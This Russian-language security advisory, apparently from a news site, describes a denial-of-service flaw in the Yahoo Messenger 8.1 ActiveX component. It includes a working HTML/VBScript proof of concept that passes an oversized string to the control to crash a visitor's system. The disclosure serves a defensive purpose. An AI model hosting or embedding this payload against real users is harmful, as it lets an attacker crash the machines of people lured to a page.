Программа: Yahoo Messenger 8.1 ActiveX

Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую
систему. Уязвимость существует из-за ошибки в проверке входных данных в Yahoo
Messenger ActiveX компоненте. Атакующий может обманным образом заманить
пользователя на специально составленный сайт, что приведет к отказу системы в
обслуживании.

Пример:

<html><body>
<object id=target classid=clsid:02478D38-C3F9-4EFB-9B51-7695ECA05670>
</object>
<script language=vbscript>
arg1=String(517140, "A")
target.c arg1
</script>
</body></html>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии